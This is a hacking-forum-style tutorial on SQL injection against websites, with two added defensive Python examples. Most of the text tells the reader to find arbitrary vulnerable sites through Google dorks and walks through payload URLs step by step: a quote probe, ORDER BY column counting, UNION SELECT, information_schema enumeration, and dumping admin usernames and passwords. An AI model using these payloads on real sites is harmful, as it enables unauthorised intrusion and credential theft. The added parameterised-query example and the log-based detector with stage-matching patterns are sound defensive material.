Introduction:

Sqli (aka SQL Injection, or Structured Query Language Injection) is usually the first step in exploiting or hacking websites. It is easily done and a great starting point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is basically injecting queries into a database, or using queries to get an authorization bypass as an admin.

Finding Sites to Inject:

Finding SQLi vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks (Google search queries that match URL patterns such as page.php?id=).

Pick one of the dorks and add inurl: before it (if it does not already have it), then copy and paste it into Google. Pick one of the sites Google returns and go to it. For example, the URL of the page you are on may look like this:

Code:
http://www.example.com/index.php?id=3

To check that it is vulnerable, all you have to do is put a ' at the end of the URL. So now your URL should look like this:

Code:
http://www.example.com/index.php?id=3'

Press enter and you get some kind of error. The errors will vary, but it should look something like this:

[Screenshot: database error message displayed on the page]

If an error happens, that site is vulnerable!

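Why the trailing quote produces the error the check above looks for, and why the same page stops being injectable once the id is bound as a parameter. This is an added example, not code from the original paste: it uses an in-memory SQLite table as a stand-in for the MySQL back end, and the table, rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the site's database: one table, three rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO articles VALUES (?, ?)",
                    [(1, "first"), (2, "second"), (3, "third")])
    return con

def lookup_vulnerable(con, user_id):
    """The bug the walkthrough depends on: the raw ?id= value is pasted into
    the SQL text, so a quote or a UNION becomes part of the statement."""
    sql = "SELECT title FROM articles WHERE id = " + user_id
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.Error as exc:
        # On a PHP/MySQL site this surfaces as the 'Warning: mysql_...' page
        # that the tutorial treats as confirmation of the vulnerability.
        return "error: " + str(exc)

def lookup_safe(con, user_id):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so the driver never lets it alter the statement."""
    if not user_id.isdigit():
        return []
    return [row[0] for row in con.execute(
        "SELECT title FROM articles WHERE id = ?", (int(user_id),))]

def compare(user_id):
    """Run the same input through both handlers so the difference is visible."""
    return {"vulnerable": lookup_vulnerable(make_db(), user_id),
            "safe": lookup_safe(make_db(), user_id)}

if __name__ == "__main__":
    for probe in ["3", "3'", "-3 UNION SELECT 'injected'--"]:
        print(repr(probe), "->", compare(probe))
```

The same input that breaks the concatenated query is simply rejected by the parameterised handler; there is no error page to key off and no second SELECT gets appended.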
 
Getting Number of Columns

After you find your vulnerable site, the first step you need to take is to find the number of columns. The easiest way to do this is to use the statement "ORDER BY". All you have to do is put ORDER BY (number)-- at the end of your URL, so it should look like this:

Code:
http://www.example.com/index.php?id=3 ORDER BY (number)--

You want to start with ORDER BY 1-- and keep increasing the number by 1 until you get an error.

For example:

Code:
http://www.example.com/index.php?id=3 order by 1--
http://www.example.com/index.php?id=3 order by 2--
http://www.example.com/index.php?id=3 order by 3--
http://www.example.com/index.php?id=3 order by 4--
http://www.example.com/index.php?id=3 order by 5--
http://www.example.com/index.php?id=3 order by 6--
http://www.example.com/index.php?id=3 order by 7--
http://www.example.com/index.php?id=3 order by 8--

Let's say on order by 8-- you get an error page. This means that the website has 7 columns, because it will give you errors on anything over 7. If you have a bad memory you should open notepad and write down the number of columns you find.

Finding Accessible Columns

Now that we have the number of columns, we need to find the column numbers that we can grab information from. We do this by using "UNION SELECT" together with the number of columns. You put them together in your URL like this:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

For the end part of the URL (1,2,3,4,5,6,7) you put the number of columns you found in the first step. Since I found that the site I was testing had 7 columns, I put 1,2,3,4,5,6,7. Also remember to put a - in front of the id number. After you do that you should get something like this...

The page should look a bit fucked up and there should be 2 numbers on the page. These two numbers are the column numbers we can get information from. We will replace them with statements later on, so write them down or remember them.

Finding MySQL Database Version

The reason you need the database version is to see whether or not the website is worth your time, because on any MySQL database under version 5 you will have to blindly guess the table and column names (information_schema, used in the later steps, only exists from MySQL 5.0 onwards). If you are a beginner and you find that the database is below 5, I urge you to find a different site.

Now we take one of the numbers that we found in the step above and replace it with @@version. For example, before our URL looked like this:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Now we replace the 1 with @@version:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Press enter and now the page should display the database version.

The number that we had in the first step is now replaced with the version number. In my case, the site I am testing has a version number of 5.0.45. Since this number is 5 or above, we will continue working on this site.

Finding Database Names

Next we are going to inject the website to find the database names. We do this by replacing @@version with group_concat(schema_name) and also adding +from+information_schema.schemata after the last number in our URL (before the --). So now our URL should look like this:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+from+information_schema.schemata--

It will list the database names. Now, to find which one is currently in use, replace group_concat(schema_name) with concat(database()) and delete +from+information_schema.schemata. So the URL should now look like this:

Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

It will display which database is in use. You may want to write it down.

Finding Table Names

To get the table names of the current database you need to replace concat(database()) with group_concat(table_name) and add from information_schema.tables where table_schema=database() between the last number and the --. Also remove the + signs from the union select. Now your URL should look like this:

Code:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

The page should now show the table names. You may want to write them down.

[Screenshot: table names displayed on the page]

Finding Column Names

This is exactly like getting table names; you just change table_name to column_name and information_schema.tables to information_schema.columns. So your URL should look like this:

Code:
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

This should give you the column names. You may want to write them down.

Let's say they gave us back the column names

admin_username
admin_password

Getting Information

Now that we have the database name, table names, and column names, we can put them together and pull information from them. To do this we need to put the following in our URL (the group_concat replaces the first of the 7 columns, as in the earlier steps, so the column count stays the same):

Code:
http://www.example.com/index.php?id=-3 union select group_concat(columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Now replace columnname with the column names you want information from. The 0x3a will make a : to separate the information. Replace databasename and tablename with the database name and the table name the columns were in. After all this your URL should look something like this:

Code:
http://www.example.com/index.php?id=-3 union select group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Now you should get usernames and passwords for the admin, or whatever information you wanted to get.

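Taken together, the steps above leave a recognisable trail in a web server's access log: a trailing quote, ORDER BY stepping, then UNION SELECT reads from information_schema. The detector below is an added example, not part of the original paste; it runs over constructed Apache combined-format log lines, and the stage names, field names and the two-stage threshold are assumptions of the example rather than any standard.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One pattern per stage of the walkthrough, matched on the URL-decoded request URI.
STAGES = {
    "quote_probe":  re.compile(r"[?&]\w+=\d+'"),
    "order_by":     re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_read":  re.compile(r"information_schema\.|@@version|database\(\)", re.I),
}
# Apache combined format: client IP, then the request line in quotes, then status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(uri):
    """Return the set of stage names a single request URI matches (after decoding)."""
    decoded = unquote_plus(uri)
    return {name for name, pat in STAGES.items() if pat.search(decoded)}

def scan(lines):
    """Map each client IP to the stages it exhibited and how many probes it sent."""
    hits = defaultdict(lambda: {"stages": set(), "requests": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, uri, _status = m.groups()
        stages = classify(uri)
        if stages:
            hits[ip]["stages"] |= stages
            hits[ip]["requests"] += 1
    return hits

def suspects(lines, min_stages=2):
    """IPs that moved through at least min_stages distinct stages: a progression,
    not a stray quote typed into a search box."""
    return sorted(ip for ip, h in scan(lines).items() if len(h["stages"]) >= min_stages)

# Constructed sample: one client following the walkthrough, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=3%27 HTTP/1.1" 500 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=3+order+by+1-- HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /index.php?id=3+order+by+8-- HTTP/1.1" 500 512',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7-- HTTP/1.1" 200 1800',
    '203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /index.php?id=-3+union+select+group_concat(table_name),2,3,4,5,6,7+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 1900',
    '198.51.100.2 - - [10/Oct/2023:13:57:01 +0000] "GET /index.php?id=3 HTTP/1.1" 200 2048',
]
```

Running suspects(SAMPLE_LOG) flags only the client that progressed through the stages; the 500 responses on the quote and ORDER BY probes are the same error pages the walkthrough uses as its signal, so alerting on them alongside the pattern match is a cheap second check.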